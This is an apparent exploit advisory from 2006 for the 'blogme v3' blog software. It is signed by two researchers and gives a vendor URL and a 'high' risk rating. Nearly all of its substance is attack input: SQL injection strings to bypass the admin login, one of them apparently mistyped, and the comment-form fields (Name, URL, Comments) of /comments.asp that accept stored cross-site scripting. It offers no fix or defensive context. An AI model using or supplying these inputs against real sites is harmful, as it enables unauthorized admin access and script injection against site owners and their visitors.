24 lines
No EOL
422 B
Text
24 lines
No EOL
422 B
Text
blogme v3 [admin login bypass & xss (post)]
|
|
vendor site:http://www.drumster.net/
|
|
product:blogme v3
|
|
bug:login bypass & xss (post)
|
|
risk:high
|
|
|
|
|
|
admin login bypass :
|
|
user : ' or '1' = '1
|
|
passwd: 1'='1' ro '
|
|
|
|
xss post :
|
|
in: /comments.asp?blog=85
|
|
vulnerables fields:
|
|
- Name
|
|
- URL
|
|
- Comments
|
|
|
|
|
|
laurent gaffié & benjamin mossé
|
|
http://s-a-p.ca/
|
|
contact: saps.audit@gmail.com
|
|
|
|
# milw0rm.com [2006-11-14] |